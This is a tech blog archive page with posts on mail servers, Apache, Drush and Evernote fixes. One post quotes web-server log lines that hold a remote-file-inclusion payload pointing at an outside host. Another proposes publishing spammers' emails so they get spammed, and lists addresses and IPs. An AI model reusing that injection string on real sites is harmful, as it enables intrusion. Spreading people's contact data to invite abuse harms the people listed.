Autarchy of the Private Cave

Tiny bits of bioinformatics, [web-]programming etc

    Archive for the 'Web' Category

    Anything web-related. Just anything.

    Mail-in-a-box, Sovereign, Modoboa, iRedMail, etc

    28th December 2016

    Preparing to dismantle my physical server (and move the various hosted things to one or more VPS),
    I’ve realized that an email server is necessary: to send website-generated emails, and also
    to receive the few rare contact requests arriving via the websites.

    My current email server was configured eons ago; it works well,
    but I have no desire to painfully transfer all of its configuration…
    Better to install something new, shiny and exciting, right? :)

    I had 3 #self-hosted, #mail-server bookmarks: Mail-in-a-box, Modoboa, and iRedMail.

    (Sovereign, the 4th one, was added after reading more about Mail-in-a-box.)

    Here are my notes on what seemed important about these 4.
    Read the rest of this entry »

    Posted in *nix, Comparison, Links, Notepad, Software, Web | No Comments »

    Evernote web-interface beta: how to fix: saved searches are crossed out and do not work

    9th May 2016

    Another symptom is a message along the lines of

    the notebook you are searching in has been moved or renamed since the saved search was created

    (which is not true).

    I had this problem, and found a solution.

    Go to your Evernote on a client where you can edit saved searches (Windows in my case),
    edit all the searches, and make sure the notebook name is quoted in the search (and, possibly, that it uses the proper letter case).

    I found this solution by first creating a search from the web-beta interface; it looked like this:

      notebook:"Mynotebook" tag:1-now

    All the crossed-out searches (despite working totally fine on Windows) looked like this:

      notebook:Mynotebook tag:1-now

    or even like this (note the lower-case 1st letter of the notebook name):

      notebook:mynotebook tag:1-now

    After editing saved searches and synchronizing, they all appear (and work) just fine in the beta web-interface.

    If you cannot edit your searches right now, there is another workaround: all the saved searches work fine for me from the Shortcuts menu (a star in the left panel).

    Hope this helps!

    Posted in how-to, Notepad, Software, Web | No Comments »

    Yandex probing for vulnerabilities in .UA domains?

    11th April 2016

    Here is a recent entry from my web-server’s access log:

    bogdan.org.ua:80 130.193.51.57 - - [09/Apr/2016:15:53:22 +0300] "GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1" 200 13158 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

    Client’s IP 130.193.51.57 does indeed belong to a Yandex network range.
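
    For reference, here is how one might double-check such a claim (these commands are mine, not from the original post); Yandex, like other major search engines, documents verifying its bot via a reverse DNS lookup plus a forward confirmation:

      # Reverse DNS: a genuine Yandex crawler resolves to a *.yandex.ru/.net/.com host name
      host 130.193.51.57
      # Then forward-resolve the returned name; it should point back to 130.193.51.57
      # (this guards against spoofed PTR records):
      #   host <name-returned-above>
      # Independently, check who owns the network range:
      whois 130.193.51.57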

    So…

    • Has Yandex started looking for vulnerabilities in the web-sites it scans?
    • Does it only look for vulnerabilities in .UA web-sites/domains?
    • Does Yandex really use a Korean web-site to host malicious code?

    In fact, there are more entries like that one, also from Yandex IPs:

    bogdan.org.ua:80 130.193.51.25 - - [04/Apr/2016:00:14:22 +0300] "GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1" 200 12607 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    bogdan.org.ua:80 130.193.51.25 - - [04/Apr/2016:00:19:31 +0300] "GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1" 200 12174 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

    I can see 3 explanations, and all of them are bad for Yandex:

    • Yandex now belongs to the KGB, and it does scan [.UA] web-sites for vulnerabilities;
    • some or many of Yandex’s crawler servers are compromised, and are being used by malicious 3rd parties;
    • there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.

    Posted in Misc, Web | No Comments »

    How to fix: mod_proxy’s ProxyPass directive does not work

    10th February 2016

    So… You have finally built a nice LXC container for your web-facing application, and even configured Apache (Debian package version 2.4.18-1 in my case) to serve some static/web-only components.
    Your client-side JavaScript UI talks (in JSON) to the API, which is implemented as a separate node.js/Python/etc server – say, on port 8000 in the same LXC container.

    The simplest way to forward requests from the web-frontend to your API is mod_proxy.
    If you want to forward any requests to /api/* to your custom back-end server on port 8000, you just add the following lines to your VirtualHost configuration:

    ProxyPass "/api" "http://localhost:8000"
    ProxyPassReverse "/api" "http://localhost:8000"

    I’d suggest not wrapping this fragment with the classical IfModule: as your application will not really work without its API back-end, you actually want Apache to fail as soon as possible if mod_proxy is missing.
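
    For context, here is a minimal sketch of how these directives might sit in a complete VirtualHost (the server name and DocumentRoot are placeholders of mine, not from the post). On Debian, the relevant modules must also be enabled (sudo a2enmod proxy proxy_http) – whether or not that turns out to be the problem this post goes on to diagnose:

      <VirtualHost *:80>
          ServerName example.com
          DocumentRoot /var/www/example

          # Requests to /api/* are forwarded to the back-end API server;
          # everything else is served as static files from DocumentRoot.
          ProxyPass "/api" "http://localhost:8000"
          ProxyPassReverse "/api" "http://localhost:8000"
      </VirtualHost>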

    That was easy, right? What, it doesn’t work? Can’t be! It’s dead simple! No way you could make a mistake in 2 lines of configuration!!! :mad_rage: :)

    Oh wait… I remember I had this problem before… Read the rest of this entry »

    Posted in *nix, how-to, Web | No Comments »

    How to update a multisite Drupal 6/7 installation using Drush

    25th August 2014

    There are quite a lot of posts on how to do this, but mine differs a tiny little bit, so I’m saving it for my own future reference, and also for the benefit of the wider audience.

    I am updating a multisite Drupal 6 installation. To the best of my knowledge, the only difference for Drupal 7 is that D7 uses the maintenance_mode variable where D6 uses site_offline.
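
    In drush terms, that difference would look something like this (a sketch, assuming the drush vset syntax of that era and @sites as your multisite alias):

      # Drupal 6: put all sites into maintenance mode before updating
      drush @sites vset site_offline 1 --yes
      # Drupal 7 equivalent
      drush @sites vset maintenance_mode 1 --yes
      # ...and back online once the update is done (0 instead of 1)
      drush @sites vset site_offline 0 --yes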

    On Debian stable and later, you can sudo aptitude install drush and then use it immediately.

    Note: I recommend su webuser (or sudo -s -u webuser) before you run any non-testing drush commands, where webuser is the user which owns your web-exposed files (Debian’s default is www-data). I’ve seen a lot of recommendations to run drush as a super-user, but that does not make sense, and may actually cause problems with file ownership.
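
    As a shell sketch of that workflow (www-data assumed as the web user):

      sudo aptitude install drush     # one-time install, as an admin user
      sudo -s -u www-data             # switch to the user owning the web-exposed files
      drush @sites pm-update          # run the actual update as www-data, not as root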

    One last thing before we start: if your drush seems to work fine but hangs when untarring modules – check this solution.

    Read the rest of this entry »

    Posted in *nix, Drupal, how-to, Notepad, PHP, Programming, Software, Web | 1 Comment »

    drush pm-update fails: tar hangs when extracting *.tar.gz module archives from drupal.org

    25th August 2014

    Drush is awesome, especially for updating multisite Drupal installations.
    I only started using it a few days ago, and immediately hit a problem, to which I did find a workaround.

    Symptoms

    • running drush @sites pm-update proceeds normally until right after answering 'y[es]'; then drush seems to hang indefinitely (I haven’t waited beyond about 10 minutes; maybe it does produce an error after a long while);
    • running the same command with --debug shows that drush hangs when trying to untar the downloaded module.tar.gz archive; there are no errors/warnings, it just hangs with no CPU usage;
    • trying to manually untar any of the modules downloaded from drupal.org is also unsuccessful: tar -xzvf module.tar.gz seems to do nothing, it also hangs with zero CPU usage/time and no warnings/errors;
    • interestingly, if I create some test.tar.gz locally, tar happily extracts it;
    • finally, running strace tar -xzvf module.tar.gz shows a number of unexpected lines, such as references to NSS and libnss files (I am only showing some of the lines of strace output, including the last line):

      open("/etc/nsswitch.conf", O_RDONLY) = 4
      read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 683
      open("/lib/x86_64-linux-gnu/libnss_nis.so.2", O_RDONLY) = 4
      open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
      open("/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
      open("/usr/lib/x86_64-linux-gnu/libnss_mysql.so.2", O_RDONLY) = 4
      open("/etc/group", O_RDONLY|O_CLOEXEC) = 4
      open("/etc/libnss-mysql.cfg", O_RDONLY) = -1 EACCES (Permission denied)
      open("/etc/libnss-mysql-root.cfg", O_RDONLY) = -1 EACCES (Permission denied)
      futex(0x7fd0816e8c48, FUTEX_WAIT_PRIVATE, 2, NULL
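
    The workaround itself is behind the “Read the rest” link below; but judging from that strace tail alone, tar is blocking inside an NSS user/group lookup which ends up in libnss-mysql (note the two EACCES lines followed by the final futex wait). Two hedged experiments of my own, not necessarily the author’s fix, to confirm where the hang lives:

      # 1) Skip user/group *name* resolution entirely during extraction:
      tar --numeric-owner -xzvf module.tar.gz
      # 2) Exercise the same NSS lookup path directly, without tar:
      getent passwd 1000
      getent group 1000
      # If getent also hangs, the culprit is the NSS stack (libnss-mysql),
      # not tar itself.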

    Read the rest of this entry »

    Posted in *nix, Drupal, Notepad, Software | No Comments »

    The list of spammers’ emails

    13th November 2013

    All sane people agree that spam is a blight on the internet, be it email spam, comment spam, forum spam, or any other form of unsolicited, blatant, shameless, out-of-context advertising. Multiple spam-fighting and spam-stopping systems are being developed.

    With automated spam, automated spam-fighting systems might be the only choice. Sending rightfully angry emails to ISPs to notify them of customers violating service agreements is probably a waste of effort (something tells me most of these complaints end up in the trash folder, or even in the… spam folder). However, I get the feeling that some spam is not automated – it appears to have been actually prepared and sent by a human. (Alternatively, the spammers behind it simply have better software.) Anyway, some spam messages seem to contain valid contact data of the advertised entity – like an email.

    The resulting idea is very simple, and has probably already been implemented somewhere by someone: publish online the contact emails of the entities which, apparently, have chosen spam as their primary means of advertising. These emails will sooner or later be harvested by spammers, added to spam databases, and will start getting progressively more spam.

    There are a few drawbacks to this approach:

    • knowing the spam-collection points enables “black PR”-like mass-mailings in the name of one’s competitor, double-hurting the innocent; I do not see a clear method of preventing this, other than by concealing the spam-collection methods;
    • human intelligence is required to verify that the contained email truly belongs to the advertised entity; this is fairly time-consuming, especially when scaled up; a possible solution (with its own problems) would be to build an online gateway for submitting curated spam samples, thus distributing the workload among all the participating volunteers;
    • the next logical step would be actually harvesting and then publishing all the emails from the advertised website;
    • the biggest drawback, however, is the low efficiency of this approach: an increased spam percentage will only be a mild nuisance, unlikely to propagate high enough to affect the spam-deciders; also, indirectly spamming someone’s mailbox will waste time which could otherwise have been used for facebook and other important activities :)

    What do you think? Should such a method be used?

    Below I provide a few sample records from real spam comments which contained true-looking emails; I’m including some extra meta-data. Ideally, this would be stored in some kind of a database.

    Submitted on 2013/11/13 at 15:23 GMT
    Author : Виктор (IP: 95.134.110.37 , 37-110-134-95.pool.ukrtel.net)
    E-mail : aionind@yandex.ru
    E-mail : sale@aion-industry.ru
    E-mail : info@aion-industry.ru

    Submitted on 2013/11/26 at 8:53 GMT
    Author : Виктор (IP: 95.134.146.235 , 235-146-134-95.pool.ukrtel.net)
    E-mail : kvazargr@yandex.ru
    E-mail : info@kvazar-gr.ru

    Submitted on 2013/11/28 at 7:24 GMT
    Author : Виктор (IP: 95.134.117.155 , 155-117-134-95.pool.ukrtel.net)
    E-mail : relevater@yandex.ru
    E-mail : info@relevate.ru
    E-mail : support@relevate.ru
    E-mail : billing@relevate.ru

    There’s definitely a need for a public database, API keys, and quorum algorithms…

    Author : casinoworka (IP: 91.207.4.201 , 201.4.207.91.unknown.SteepHost.Net)
    E-mail : pharmacywork7777777@gmail.com
    E-mail : info@prowessmedical.com

    Posted in Misc, Web | No Comments »